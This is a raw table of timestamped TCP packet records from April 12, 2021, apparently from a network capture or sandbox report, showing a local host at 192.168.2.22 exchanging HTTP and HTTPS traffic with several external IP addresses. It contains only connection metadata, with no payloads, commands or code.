Apr 12, 2021 07:47:22.286299944 CEST	49168	80	192.168.2.22	103.141.138.118
Apr 12, 2021 07:47:22.286340952 CEST	80	49168	103.141.138.118	192.168.2.22
Apr 12, 2021 07:47:22.286360025 CEST	49168	80	192.168.2.22	103.141.138.118
Apr 12, 2021 07:47:22.286386013 CEST	80	49168	103.141.138.118	192.168.2.22
Apr 12, 2021 07:47:22.286412954 CEST	49168	80	192.168.2.22	103.141.138.118
Apr 12, 2021 07:47:22.286434889 CEST	80	49168	103.141.138.118	192.168.2.22
Apr 12, 2021 07:47:22.286474943 CEST	49168	80	192.168.2.22	103.141.138.118
Apr 12, 2021 07:47:22.286490917 CEST	80	49168	103.141.138.118	192.168.2.22
Apr 12, 2021 07:47:22.286501884 CEST	49168	80	192.168.2.22	103.141.138.118
Apr 12, 2021 07:47:22.286533117 CEST	80	49168	103.141.138.118	192.168.2.22
Apr 12, 2021 07:47:22.286559105 CEST	49168	80	192.168.2.22	103.141.138.118
Apr 12, 2021 07:47:22.286582947 CEST	49168	80	192.168.2.22	103.141.138.118
Apr 12, 2021 07:47:22.286592007 CEST	80	49168	103.141.138.118	192.168.2.22
Apr 12, 2021 07:47:22.286634922 CEST	80	49168	103.141.138.118	192.168.2.22
Apr 12, 2021 07:47:22.286659002 CEST	49168	80	192.168.2.22	103.141.138.118
Apr 12, 2021 07:47:22.286684036 CEST	80	49168	103.141.138.118	192.168.2.22
Apr 12, 2021 07:47:22.286686897 CEST	49168	80	192.168.2.22	103.141.138.118
Apr 12, 2021 07:47:22.286727905 CEST	80	49168	103.141.138.118	192.168.2.22
Apr 12, 2021 07:47:22.286766052 CEST	49168	80	192.168.2.22	103.141.138.118
Apr 12, 2021 07:47:22.286777973 CEST	80	49168	103.141.138.118	192.168.2.22
Apr 12, 2021 07:47:22.286815882 CEST	80	49168	103.141.138.118	192.168.2.22
Apr 12, 2021 07:47:22.286849022 CEST	49168	80	192.168.2.22	103.141.138.118
Apr 12, 2021 07:47:22.286865950 CEST	80	49168	103.141.138.118	192.168.2.22
Apr 12, 2021 07:47:22.286870003 CEST	49168	80	192.168.2.22	103.141.138.118
Apr 12, 2021 07:47:22.286907911 CEST	80	49168	103.141.138.118	192.168.2.22
Apr 12, 2021 07:47:22.286945105 CEST	49168	80	192.168.2.22	103.141.138.118
Apr 12, 2021 07:47:22.286963940 CEST	49168	80	192.168.2.22	103.141.138.118
Apr 12, 2021 07:47:22.286966085 CEST	80	49168	103.141.138.118	192.168.2.22
Apr 12, 2021 07:47:22.287010908 CEST	80	49168	103.141.138.118	192.168.2.22
Apr 12, 2021 07:47:22.287065983 CEST	80	49168	103.141.138.118	192.168.2.22
Apr 12, 2021 07:47:22.287071943 CEST	49168	80	192.168.2.22	103.141.138.118
Apr 12, 2021 07:47:22.287082911 CEST	49168	80	192.168.2.22	103.141.138.118
Apr 12, 2021 07:47:22.287113905 CEST	80	49168	103.141.138.118	192.168.2.22
Apr 12, 2021 07:47:22.287137985 CEST	49168	80	192.168.2.22	103.141.138.118
Apr 12, 2021 07:47:22.287163973 CEST	49168	80	192.168.2.22	103.141.138.118
Apr 12, 2021 07:47:22.287166119 CEST	80	49168	103.141.138.118	192.168.2.22
Apr 12, 2021 07:47:22.287205935 CEST	80	49168	103.141.138.118	192.168.2.22
Apr 12, 2021 07:47:22.287233114 CEST	49168	80	192.168.2.22	103.141.138.118
Apr 12, 2021 07:47:22.287256002 CEST	80	49168	103.141.138.118	192.168.2.22
Apr 12, 2021 07:47:22.287266970 CEST	49168	80	192.168.2.22	103.141.138.118
Apr 12, 2021 07:47:22.287301064 CEST	80	49168	103.141.138.118	192.168.2.22
Apr 12, 2021 07:47:22.287324905 CEST	49168	80	192.168.2.22	103.141.138.118
Apr 12, 2021 07:47:22.287348986 CEST	49168	80	192.168.2.22	103.141.138.118
Apr 12, 2021 07:47:22.287358999 CEST	80	49168	103.141.138.118	192.168.2.22
Apr 12, 2021 07:47:22.287403107 CEST	80	49168	103.141.138.118	192.168.2.22
Apr 12, 2021 07:47:22.287435055 CEST	49168	80	192.168.2.22	103.141.138.118
Apr 12, 2021 07:47:22.287452936 CEST	80	49168	103.141.138.118	192.168.2.22
Apr 12, 2021 07:47:22.287456036 CEST	49168	80	192.168.2.22	103.141.138.118
Apr 12, 2021 07:47:22.287493944 CEST	80	49168	103.141.138.118	192.168.2.22
Apr 12, 2021 07:47:22.287519932 CEST	49168	80	192.168.2.22	103.141.138.118
Apr 12, 2021 07:47:22.287544966 CEST	80	49168	103.141.138.118	192.168.2.22
Apr 12, 2021 07:47:22.287547112 CEST	49168	80	192.168.2.22	103.141.138.118
Apr 12, 2021 07:47:22.287585020 CEST	80	49168	103.141.138.118	192.168.2.22
Apr 12, 2021 07:47:22.287612915 CEST	49168	80	192.168.2.22	103.141.138.118
Apr 12, 2021 07:47:22.287636042 CEST	80	49168	103.141.138.118	192.168.2.22
Apr 12, 2021 07:47:22.287651062 CEST	49168	80	192.168.2.22	103.141.138.118
Apr 12, 2021 07:47:22.287678957 CEST	80	49168	103.141.138.118	192.168.2.22
Apr 12, 2021 07:47:22.287698984 CEST	49168	80	192.168.2.22	103.141.138.118
Apr 12, 2021 07:47:22.287731886 CEST	49168	80	192.168.2.22	103.141.138.118
Apr 12, 2021 07:47:22.287734985 CEST	80	49168	103.141.138.118	192.168.2.22
Apr 12, 2021 07:47:22.287781000 CEST	80	49168	103.141.138.118	192.168.2.22
Apr 12, 2021 07:47:22.287800074 CEST	49168	80	192.168.2.22	103.141.138.118
Apr 12, 2021 07:47:22.287825108 CEST	49168	80	192.168.2.22	103.141.138.118
Apr 12, 2021 07:47:22.287832022 CEST	80	49168	103.141.138.118	192.168.2.22
Apr 12, 2021 07:47:22.287873030 CEST	80	49168	103.141.138.118	192.168.2.22
Apr 12, 2021 07:47:22.287904024 CEST	49168	80	192.168.2.22	103.141.138.118
Apr 12, 2021 07:47:22.287925005 CEST	80	49168	103.141.138.118	192.168.2.22
Apr 12, 2021 07:47:22.287929058 CEST	49168	80	192.168.2.22	103.141.138.118
Apr 12, 2021 07:47:22.287966013 CEST	80	49168	103.141.138.118	192.168.2.22
Apr 12, 2021 07:47:22.287997961 CEST	49168	80	192.168.2.22	103.141.138.118
Apr 12, 2021 07:47:22.288014889 CEST	80	49168	103.141.138.118	192.168.2.22
Apr 12, 2021 07:47:22.288028955 CEST	49168	80	192.168.2.22	103.141.138.118
Apr 12, 2021 07:47:22.288058996 CEST	80	49168	103.141.138.118	192.168.2.22
Apr 12, 2021 07:47:22.288122892 CEST	80	49168	103.141.138.118	192.168.2.22
Apr 12, 2021 07:47:22.288127899 CEST	49168	80	192.168.2.22	103.141.138.118
Apr 12, 2021 07:47:22.288139105 CEST	49168	80	192.168.2.22	103.141.138.118
Apr 12, 2021 07:47:22.288165092 CEST	80	49168	103.141.138.118	192.168.2.22
Apr 12, 2021 07:47:22.288192034 CEST	49168	80	192.168.2.22	103.141.138.118
Apr 12, 2021 07:47:22.288214922 CEST	80	49168	103.141.138.118	192.168.2.22
Apr 12, 2021 07:47:22.288230896 CEST	49168	80	192.168.2.22	103.141.138.118
Apr 12, 2021 07:47:22.288284063 CEST	49168	80	192.168.2.22	103.141.138.118
Apr 12, 2021 07:47:22.299186945 CEST	80	49168	103.141.138.118	192.168.2.22
Apr 12, 2021 07:47:22.299220085 CEST	80	49168	103.141.138.118	192.168.2.22
Apr 12, 2021 07:47:22.299428940 CEST	49168	80	192.168.2.22	103.141.138.118
Apr 12, 2021 07:47:22.299628973 CEST	49168	80	192.168.2.22	103.141.138.118
Apr 12, 2021 07:47:22.304730892 CEST	49168	80	192.168.2.22	103.141.138.118
Apr 12, 2021 07:47:22.515911102 CEST	80	49168	103.141.138.118	192.168.2.22
Apr 12, 2021 07:47:22.515971899 CEST	80	49168	103.141.138.118	192.168.2.22
Apr 12, 2021 07:47:22.516010046 CEST	80	49168	103.141.138.118	192.168.2.22
Apr 12, 2021 07:47:22.516048908 CEST	80	49168	103.141.138.118	192.168.2.22
Apr 12, 2021 07:47:22.516052961 CEST	49168	80	192.168.2.22	103.141.138.118
Apr 12, 2021 07:47:22.516084909 CEST	80	49168	103.141.138.118	192.168.2.22
Apr 12, 2021 07:47:22.516091108 CEST	49168	80	192.168.2.22	103.141.138.118
Apr 12, 2021 07:47:22.516097069 CEST	49168	80	192.168.2.22	103.141.138.118
Apr 12, 2021 07:47:22.516100883 CEST	49168	80	192.168.2.22	103.141.138.118
Apr 12, 2021 07:47:22.516122103 CEST	49168	80	192.168.2.22	103.141.138.118
Apr 12, 2021 07:47:22.516134977 CEST	80	49168	103.141.138.118	192.168.2.22
Apr 12, 2021 07:47:22.516176939 CEST	80	49168	103.141.138.118	192.168.2.22
Apr 12, 2021 07:47:22.516192913 CEST	49168	80	192.168.2.22	103.141.138.118
Apr 12, 2021 07:47:22.516215086 CEST	80	49168	103.141.138.118	192.168.2.22
Apr 12, 2021 07:47:22.516216993 CEST	49168	80	192.168.2.22	103.141.138.118
Apr 12, 2021 07:47:22.516252041 CEST	80	49168	103.141.138.118	192.168.2.22
Apr 12, 2021 07:47:22.516259909 CEST	49168	80	192.168.2.22	103.141.138.118
Apr 12, 2021 07:47:22.516290903 CEST	80	49168	103.141.138.118	192.168.2.22
Apr 12, 2021 07:47:22.516294956 CEST	49168	80	192.168.2.22	103.141.138.118
Apr 12, 2021 07:47:22.516326904 CEST	80	49168	103.141.138.118	192.168.2.22
Apr 12, 2021 07:47:22.516330957 CEST	49168	80	192.168.2.22	103.141.138.118
Apr 12, 2021 07:47:22.516365051 CEST	80	49168	103.141.138.118	192.168.2.22
Apr 12, 2021 07:47:22.516377926 CEST	49168	80	192.168.2.22	103.141.138.118
Apr 12, 2021 07:47:22.516402006 CEST	80	49168	103.141.138.118	192.168.2.22
Apr 12, 2021 07:47:22.516408920 CEST	49168	80	192.168.2.22	103.141.138.118
Apr 12, 2021 07:47:22.516444921 CEST	49168	80	192.168.2.22	103.141.138.118
Apr 12, 2021 07:47:22.516448975 CEST	80	49168	103.141.138.118	192.168.2.22
Apr 12, 2021 07:47:22.516490936 CEST	80	49168	103.141.138.118	192.168.2.22
Apr 12, 2021 07:47:22.516493082 CEST	49168	80	192.168.2.22	103.141.138.118
Apr 12, 2021 07:47:22.516529083 CEST	80	49168	103.141.138.118	192.168.2.22
Apr 12, 2021 07:47:22.516530991 CEST	49168	80	192.168.2.22	103.141.138.118
Apr 12, 2021 07:47:22.516566992 CEST	80	49168	103.141.138.118	192.168.2.22
Apr 12, 2021 07:47:22.516568899 CEST	49168	80	192.168.2.22	103.141.138.118
Apr 12, 2021 07:47:22.516603947 CEST	80	49168	103.141.138.118	192.168.2.22
Apr 12, 2021 07:47:22.516607046 CEST	49168	80	192.168.2.22	103.141.138.118
Apr 12, 2021 07:47:22.516640902 CEST	80	49168	103.141.138.118	192.168.2.22
Apr 12, 2021 07:47:22.516647100 CEST	49168	80	192.168.2.22	103.141.138.118
Apr 12, 2021 07:47:22.516680002 CEST	80	49168	103.141.138.118	192.168.2.22
Apr 12, 2021 07:47:22.516686916 CEST	49168	80	192.168.2.22	103.141.138.118
Apr 12, 2021 07:47:22.516709089 CEST	49168	80	192.168.2.22	103.141.138.118
Apr 12, 2021 07:47:22.516716957 CEST	80	49168	103.141.138.118	192.168.2.22
Apr 12, 2021 07:47:22.516717911 CEST	49168	80	192.168.2.22	103.141.138.118
Apr 12, 2021 07:47:22.516760111 CEST	49168	80	192.168.2.22	103.141.138.118
Apr 12, 2021 07:47:22.516765118 CEST	80	49168	103.141.138.118	192.168.2.22
Apr 12, 2021 07:47:22.516805887 CEST	80	49168	103.141.138.118	192.168.2.22
Apr 12, 2021 07:47:22.516808987 CEST	49168	80	192.168.2.22	103.141.138.118
Apr 12, 2021 07:47:22.516843081 CEST	80	49168	103.141.138.118	192.168.2.22
Apr 12, 2021 07:47:22.516853094 CEST	49168	80	192.168.2.22	103.141.138.118
Apr 12, 2021 07:47:22.516880989 CEST	80	49168	103.141.138.118	192.168.2.22
Apr 12, 2021 07:47:22.516881943 CEST	49168	80	192.168.2.22	103.141.138.118
Apr 12, 2021 07:47:22.516921043 CEST	80	49168	103.141.138.118	192.168.2.22
Apr 12, 2021 07:47:22.516921997 CEST	49168	80	192.168.2.22	103.141.138.118
Apr 12, 2021 07:47:22.516959906 CEST	80	49168	103.141.138.118	192.168.2.22
Apr 12, 2021 07:47:22.516962051 CEST	49168	80	192.168.2.22	103.141.138.118
Apr 12, 2021 07:47:22.516998053 CEST	80	49168	103.141.138.118	192.168.2.22
Apr 12, 2021 07:47:22.516999960 CEST	49168	80	192.168.2.22	103.141.138.118
Apr 12, 2021 07:47:22.517035007 CEST	80	49168	103.141.138.118	192.168.2.22
Apr 12, 2021 07:47:22.517039061 CEST	49168	80	192.168.2.22	103.141.138.118
Apr 12, 2021 07:47:22.517077923 CEST	49168	80	192.168.2.22	103.141.138.118
Apr 12, 2021 07:47:22.517081022 CEST	80	49168	103.141.138.118	192.168.2.22
Apr 12, 2021 07:47:22.517123938 CEST	49168	80	192.168.2.22	103.141.138.118
Apr 12, 2021 07:47:22.517124891 CEST	80	49168	103.141.138.118	192.168.2.22
Apr 12, 2021 07:47:22.517179012 CEST	80	49168	103.141.138.118	192.168.2.22
Apr 12, 2021 07:47:22.517220020 CEST	80	49168	103.141.138.118	192.168.2.22
Apr 12, 2021 07:47:22.517246008 CEST	49168	80	192.168.2.22	103.141.138.118
Apr 12, 2021 07:47:22.517257929 CEST	49168	80	192.168.2.22	103.141.138.118
Apr 12, 2021 07:47:22.517263889 CEST	49168	80	192.168.2.22	103.141.138.118
Apr 12, 2021 07:47:22.518659115 CEST	49168	80	192.168.2.22	103.141.138.118
Apr 12, 2021 07:47:22.519964933 CEST	49168	80	192.168.2.22	103.141.138.118
Apr 12, 2021 07:47:22.930991888 CEST	49165	443	192.168.2.22	52.59.165.42
Apr 12, 2021 07:47:22.931157112 CEST	49168	80	192.168.2.22	103.141.138.118
Apr 12, 2021 07:47:39.321691990 CEST	49169	80	192.168.2.22	74.125.143.82
Apr 12, 2021 07:47:39.369510889 CEST	80	49169	74.125.143.82	192.168.2.22
Apr 12, 2021 07:47:39.369683981 CEST	49169	80	192.168.2.22	74.125.143.82
Apr 12, 2021 07:47:39.370704889 CEST	49169	80	192.168.2.22	74.125.143.82
Apr 12, 2021 07:47:39.418257952 CEST	80	49169	74.125.143.82	192.168.2.22
Apr 12, 2021 07:47:39.418314934 CEST	80	49169	74.125.143.82	192.168.2.22
Apr 12, 2021 07:47:39.418358088 CEST	80	49169	74.125.143.82	192.168.2.22
Apr 12, 2021 07:47:39.418521881 CEST	49169	80	192.168.2.22	74.125.143.82
Apr 12, 2021 07:47:39.419923067 CEST	49169	80	192.168.2.22	74.125.143.82
Apr 12, 2021 07:47:39.419970036 CEST	49169	80	192.168.2.22	74.125.143.82
Apr 12, 2021 07:47:41.168646097 CEST	49170	80	192.168.2.22	74.125.143.82
Apr 12, 2021 07:47:41.216253042 CEST	80	49170	74.125.143.82	192.168.2.22
Apr 12, 2021 07:47:41.216377020 CEST	49170	80	192.168.2.22	74.125.143.82
Apr 12, 2021 07:47:41.216984034 CEST	49170	80	192.168.2.22	74.125.143.82
Apr 12, 2021 07:47:41.264471054 CEST	80	49170	74.125.143.82	192.168.2.22
Apr 12, 2021 07:47:41.264513969 CEST	80	49170	74.125.143.82	192.168.2.22
Apr 12, 2021 07:47:41.264535904 CEST	80	49170	74.125.143.82	192.168.2.22
Apr 12, 2021 07:47:41.264570951 CEST	49170	80	192.168.2.22	74.125.143.82
Apr 12, 2021 07:47:41.264600039 CEST	49170	80	192.168.2.22	74.125.143.82
Apr 12, 2021 07:47:41.265219927 CEST	49170	80	192.168.2.22	74.125.143.82
Apr 12, 2021 07:47:41.265248060 CEST	49170	80	192.168.2.22	74.125.143.82
Apr 12, 2021 07:47:42.584213972 CEST	49171	80	192.168.2.22	74.125.143.82
Apr 12, 2021 07:47:42.632443905 CEST	80	49171	74.125.143.82	192.168.2.22
Apr 12, 2021 07:47:42.633213043 CEST	49171	80	192.168.2.22	74.125.143.82
Apr 12, 2021 07:47:42.633268118 CEST	49171	80	192.168.2.22	74.125.143.82
Apr 12, 2021 07:47:42.681337118 CEST	80	49171	74.125.143.82	192.168.2.22
Apr 12, 2021 07:47:42.681402922 CEST	80	49171	74.125.143.82	192.168.2.22
Apr 12, 2021 07:47:42.681449890 CEST	80	49171	74.125.143.82	192.168.2.22
Apr 12, 2021 07:47:42.681561947 CEST	49171	80	192.168.2.22	74.125.143.82
Apr 12, 2021 07:47:42.681641102 CEST	49171	80	192.168.2.22	74.125.143.82
Apr 12, 2021 07:47:42.682027102 CEST	49171	80	192.168.2.22	74.125.143.82
Apr 12, 2021 07:47:42.682168007 CEST	49171	80	192.168.2.22	74.125.143.82
Apr 12, 2021 07:47:43.369065046 CEST	49172	443	192.168.2.22	103.67.236.191
Apr 12, 2021 07:47:43.544917107 CEST	443	49172	103.67.236.191	192.168.2.22
Apr 12, 2021 07:47:43.544935942 CEST	443	49172	103.67.236.191	192.168.2.22
Apr 12, 2021 07:47:43.545034885 CEST	49172	443	192.168.2.22	103.67.236.191
Apr 12, 2021 07:47:43.545066118 CEST	49172	443	192.168.2.22	103.67.236.191
Apr 12, 2021 07:47:43.577064991 CEST	49172	443	192.168.2.22	103.67.236.191
Apr 12, 2021 07:47:43.752281904 CEST	443	49172	103.67.236.191	192.168.2.22
Apr 12, 2021 07:47:43.752300024 CEST	443	49172	103.67.236.191	192.168.2.22
Apr 12, 2021 07:47:43.753037930 CEST	443	49172	103.67.236.191	192.168.2.22
Apr 12, 2021 07:47:43.753103971 CEST	49172	443	192.168.2.22	103.67.236.191
Apr 12, 2021 07:47:43.753436089 CEST	443	49172	103.67.236.191	192.168.2.22
Apr 12, 2021 07:47:43.753529072 CEST	49172	443	192.168.2.22	103.67.236.191
Apr 12, 2021 07:47:43.753530025 CEST	443	49172	103.67.236.191	192.168.2.22
Apr 12, 2021 07:47:43.753549099 CEST	443	49172	103.67.236.191	192.168.2.22
Apr 12, 2021 07:47:43.753675938 CEST	49172	443	192.168.2.22	103.67.236.191
Apr 12, 2021 07:47:43.753681898 CEST	49172	443	192.168.2.22	103.67.236.191
Apr 12, 2021 07:47:43.753707886 CEST	443	49172	103.67.236.191	192.168.2.22
Apr 12, 2021 07:47:43.753765106 CEST	49172	443	192.168.2.22	103.67.236.191
Apr 12, 2021 07:47:43.753799915 CEST	443	49172	103.67.236.191	192.168.2.22
Apr 12, 2021 07:47:43.753823996 CEST	443	49172	103.67.236.191	192.168.2.22
Apr 12, 2021 07:47:43.753839016 CEST	443	49172	103.67.236.191	192.168.2.22
Apr 12, 2021 07:47:43.753875017 CEST	49172	443	192.168.2.22	103.67.236.191
Apr 12, 2021 07:47:43.753886938 CEST	49172	443	192.168.2.22	103.67.236.191
Apr 12, 2021 07:47:43.753890038 CEST	49172	443	192.168.2.22	103.67.236.191
Apr 12, 2021 07:47:43.758964062 CEST	443	49172	103.67.236.191	192.168.2.22
Apr 12, 2021 07:47:43.759056091 CEST	49172	443	192.168.2.22	103.67.236.191
Apr 12, 2021 07:47:43.762454987 CEST	443	49172	103.67.236.191	192.168.2.22
Apr 12, 2021 07:47:43.762542963 CEST	49172	443	192.168.2.22	103.67.236.191
Apr 12, 2021 07:47:43.767585039 CEST	49172	443	192.168.2.22	103.67.236.191
Apr 12, 2021 07:47:43.942954063 CEST	443	49172	103.67.236.191	192.168.2.22
Apr 12, 2021 07:47:43.942981958 CEST	443	49172	103.67.236.191	192.168.2.22
Apr 12, 2021 07:47:43.943078041 CEST	49172	443	192.168.2.22	103.67.236.191
Apr 12, 2021 07:47:45.114192963 CEST	49172	443	192.168.2.22	103.67.236.191
Apr 12, 2021 07:47:45.291769981 CEST	443	49172	103.67.236.191	192.168.2.22
Apr 12, 2021 07:47:45.291841984 CEST	443	49172	103.67.236.191	192.168.2.22
Apr 12, 2021 07:47:45.291892052 CEST	443	49172	103.67.236.191	192.168.2.22
Apr 12, 2021 07:47:45.291980982 CEST	443	49172	103.67.236.191	192.168.2.22
Apr 12, 2021 07:47:45.292042971 CEST	49172	443	192.168.2.22	103.67.236.191
Apr 12, 2021 07:47:45.292092085 CEST	49172	443	192.168.2.22	103.67.236.191
Apr 12, 2021 07:47:45.292092085 CEST	443	49172	103.67.236.191	192.168.2.22
Apr 12, 2021 07:47:45.292176008 CEST	443	49172	103.67.236.191	192.168.2.22
Apr 12, 2021 07:47:45.292228937 CEST	49172	443	192.168.2.22	103.67.236.191
Apr 12, 2021 07:47:45.292236090 CEST	443	49172	103.67.236.191	192.168.2.22
Apr 12, 2021 07:47:45.292236090 CEST	49172	443	192.168.2.22	103.67.236.191
Apr 12, 2021 07:47:45.292296886 CEST	443	49172	103.67.236.191	192.168.2.22
Apr 12, 2021 07:47:45.292352915 CEST	443	49172	103.67.236.191	192.168.2.22
Apr 12, 2021 07:47:45.292371035 CEST	49172	443	192.168.2.22	103.67.236.191
Apr 12, 2021 07:47:45.292381048 CEST	49172	443	192.168.2.22	103.67.236.191
Apr 12, 2021 07:47:45.292403936 CEST	443	49172	103.67.236.191	192.168.2.22
Apr 12, 2021 07:47:45.292416096 CEST	49172	443	192.168.2.22	103.67.236.191
Apr 12, 2021 07:47:45.292455912 CEST	443	49172	103.67.236.191	192.168.2.22
Apr 12, 2021 07:47:45.292464972 CEST	49172	443	192.168.2.22	103.67.236.191
Apr 12, 2021 07:47:45.292512894 CEST	443	49172	103.67.236.191	192.168.2.22
Apr 12, 2021 07:47:45.292562008 CEST	49172	443	192.168.2.22	103.67.236.191
Apr 12, 2021 07:47:45.292578936 CEST	443	49172	103.67.236.191	192.168.2.22
Apr 12, 2021 07:47:45.292601109 CEST	49172	443	192.168.2.22	103.67.236.191
Apr 12, 2021 07:47:45.292638063 CEST	443	49172	103.67.236.191	192.168.2.22
Apr 12, 2021 07:47:45.292691946 CEST	49172	443	192.168.2.22	103.67.236.191
Apr 12, 2021 07:47:45.292697906 CEST	443	49172	103.67.236.191	192.168.2.22
Apr 12, 2021 07:47:45.292725086 CEST	49172	443	192.168.2.22	103.67.236.191
Apr 12, 2021 07:47:45.292753935 CEST	443	49172	103.67.236.191	192.168.2.22
Apr 12, 2021 07:47:45.292772055 CEST	49172	443	192.168.2.22	103.67.236.191
Apr 12, 2021 07:47:45.292809963 CEST	443	49172	103.67.236.191	192.168.2.22
Apr 12, 2021 07:47:45.292867899 CEST	443	49172	103.67.236.191	192.168.2.22
Apr 12, 2021 07:47:45.292869091 CEST	49172	443	192.168.2.22	103.67.236.191
Apr 12, 2021 07:47:45.292881012 CEST	49172	443	192.168.2.22	103.67.236.191
Apr 12, 2021 07:47:45.292918921 CEST	49172	443	192.168.2.22	103.67.236.191
Apr 12, 2021 07:47:45.292924881 CEST	443	49172	103.67.236.191	192.168.2.22
Apr 12, 2021 07:47:45.292968988 CEST	49172	443	192.168.2.22	103.67.236.191
Apr 12, 2021 07:47:45.292983055 CEST	443	49172	103.67.236.191	192.168.2.22
Apr 12, 2021 07:47:45.293030977 CEST	49172	443	192.168.2.22	103.67.236.191
Apr 12, 2021 07:47:45.294456959 CEST	49172	443	192.168.2.22	103.67.236.191
Apr 12, 2021 07:47:45.672775030 CEST	443	49172	103.67.236.191	192.168.2.22
Apr 12, 2021 07:47:45.672880888 CEST	443	49172	103.67.236.191	192.168.2.22
Apr 12, 2021 07:47:45.672982931 CEST	49172	443	192.168.2.22	103.67.236.191
Apr 12, 2021 07:47:45.673032045 CEST	49172	443	192.168.2.22	103.67.236.191
Apr 12, 2021 07:47:45.848186970 CEST	443	49172	103.67.236.191	192.168.2.22
Apr 12, 2021 07:47:45.848223925 CEST	443	49172	103.67.236.191	192.168.2.22
Apr 12, 2021 07:47:45.848269939 CEST	443	49172	103.67.236.191	192.168.2.22
Apr 12, 2021 07:47:45.848510027 CEST	443	49172	103.67.236.191	192.168.2.22
Apr 12, 2021 07:47:45.848535061 CEST	443	49172	103.67.236.191	192.168.2.22
Apr 12, 2021 07:47:45.848558903 CEST	443	49172	103.67.236.191	192.168.2.22
Apr 12, 2021 07:47:45.848581076 CEST	443	49172	103.67.236.191	192.168.2.22
Apr 12, 2021 07:47:45.848628044 CEST	49172	443	192.168.2.22	103.67.236.191
Apr 12, 2021 07:47:45.848642111 CEST	443	49172	103.67.236.191	192.168.2.22
Apr 12, 2021 07:47:45.848650932 CEST	49172	443	192.168.2.22	103.67.236.191
Apr 12, 2021 07:47:45.848659992 CEST	49172	443	192.168.2.22	103.67.236.191
Apr 12, 2021 07:47:45.848666906 CEST	443	49172	103.67.236.191	192.168.2.22
Apr 12, 2021 07:47:45.848669052 CEST	49172	443	192.168.2.22	103.67.236.191
Apr 12, 2021 07:47:45.848675013 CEST	49172	443	192.168.2.22	103.67.236.191
Apr 12, 2021 07:47:45.848690033 CEST	49172	443	192.168.2.22	103.67.236.191
Apr 12, 2021 07:47:45.848695040 CEST	443	49172	103.67.236.191	192.168.2.22
Apr 12, 2021 07:47:45.848718882 CEST	443	49172	103.67.236.191	192.168.2.22
Apr 12, 2021 07:47:45.848727942 CEST	49172	443	192.168.2.22	103.67.236.191
Apr 12, 2021 07:47:45.848745108 CEST	443	49172	103.67.236.191	192.168.2.22
Apr 12, 2021 07:47:45.848815918 CEST	443	49172	103.67.236.191	192.168.2.22
Apr 12, 2021 07:47:45.848839045 CEST	443	49172	103.67.236.191	192.168.2.22
Apr 12, 2021 07:47:45.848884106 CEST	49172	443	192.168.2.22	103.67.236.191
Apr 12, 2021 07:47:45.848920107 CEST	49172	443	192.168.2.22	103.67.236.191
Apr 12, 2021 07:47:45.849041939 CEST	443	49172	103.67.236.191	192.168.2.22
Apr 12, 2021 07:47:45.849067926 CEST	443	49172	103.67.236.191	192.168.2.22
Apr 12, 2021 07:47:45.849092007 CEST	443	49172	103.67.236.191	192.168.2.22
Apr 12, 2021 07:47:45.849126101 CEST	49172	443	192.168.2.22	103.67.236.191
Apr 12, 2021 07:47:45.849142075 CEST	49172	443	192.168.2.22	103.67.236.191
Apr 12, 2021 07:47:45.849148989 CEST	49172	443	192.168.2.22	103.67.236.191
Apr 12, 2021 07:47:45.849153996 CEST	49172	443	192.168.2.22	103.67.236.191
Apr 12, 2021 07:47:45.849173069 CEST	443	49172	103.67.236.191	192.168.2.22
Apr 12, 2021 07:47:45.849231005 CEST	443	49172	103.67.236.191	192.168.2.22
Apr 12, 2021 07:47:45.849257946 CEST	443	49172	103.67.236.191	192.168.2.22
Apr 12, 2021 07:47:45.849280119 CEST	443	49172	103.67.236.191	192.168.2.22
Apr 12, 2021 07:47:45.849303961 CEST	443	49172	103.67.236.191	192.168.2.22
Apr 12, 2021 07:47:45.849312067 CEST	49172	443	192.168.2.22	103.67.236.191
Apr 12, 2021 07:47:45.849322081 CEST	49172	443	192.168.2.22	103.67.236.191
Apr 12, 2021 07:47:45.849327087 CEST	49172	443	192.168.2.22	103.67.236.191
Apr 12, 2021 07:47:45.849330902 CEST	443	49172	103.67.236.191	192.168.2.22
Apr 12, 2021 07:47:45.849422932 CEST	49172	443	192.168.2.22	103.67.236.191
Apr 12, 2021 07:47:45.849441051 CEST	49172	443	192.168.2.22	103.67.236.191
Apr 12, 2021 07:47:45.849447966 CEST	49172	443	192.168.2.22	103.67.236.191
Apr 12, 2021 07:47:45.849518061 CEST	443	49172	103.67.236.191	192.168.2.22
Apr 12, 2021 07:47:45.849540949 CEST	443	49172	103.67.236.191	192.168.2.22
Apr 12, 2021 07:47:45.849565983 CEST	443	49172	103.67.236.191	192.168.2.22
Apr 12, 2021 07:47:45.849589109 CEST	443	49172	103.67.236.191	192.168.2.22
Apr 12, 2021 07:47:45.849601984 CEST	49172	443	192.168.2.22	103.67.236.191
Apr 12, 2021 07:47:45.849610090 CEST	443	49172	103.67.236.191	192.168.2.22
Apr 12, 2021 07:47:45.849611998 CEST	49172	443	192.168.2.22	103.67.236.191
Apr 12, 2021 07:47:45.849617004 CEST	49172	443	192.168.2.22	103.67.236.191
Apr 12, 2021 07:47:45.849627018 CEST	49172	443	192.168.2.22	103.67.236.191
Apr 12, 2021 07:47:45.849632978 CEST	443	49172	103.67.236.191	192.168.2.22
Apr 12, 2021 07:47:45.849684000 CEST	49172	443	192.168.2.22	103.67.236.191
Apr 12, 2021 07:47:45.849817991 CEST	443	49172	103.67.236.191	192.168.2.22
Apr 12, 2021 07:47:45.849894047 CEST	443	49172	103.67.236.191	192.168.2.22
Apr 12, 2021 07:47:45.849917889 CEST	443	49172	103.67.236.191	192.168.2.22
Apr 12, 2021 07:47:45.849941969 CEST	443	49172	103.67.236.191	192.168.2.22
Apr 12, 2021 07:47:45.849946022 CEST	49172	443	192.168.2.22	103.67.236.191
Apr 12, 2021 07:47:45.849958897 CEST	49172	443	192.168.2.22	103.67.236.191
Apr 12, 2021 07:47:45.849963903 CEST	443	49172	103.67.236.191	192.168.2.22
Apr 12, 2021 07:47:45.849991083 CEST	443	49172	103.67.236.191	192.168.2.22
Apr 12, 2021 07:47:45.849992990 CEST	49172	443	192.168.2.22	103.67.236.191
Apr 12, 2021 07:47:45.850004911 CEST	49172	443	192.168.2.22	103.67.236.191
Apr 12, 2021 07:47:45.850038052 CEST	49172	443	192.168.2.22	103.67.236.191
Apr 12, 2021 07:47:45.850086927 CEST	49172	443	192.168.2.22	103.67.236.191
Apr 12, 2021 07:47:45.851742029 CEST	443	49172	103.67.236.191	192.168.2.22
Apr 12, 2021 07:47:45.851767063 CEST	443	49172	103.67.236.191	192.168.2.22
Apr 12, 2021 07:47:45.851790905 CEST	443	49172	103.67.236.191	192.168.2.22
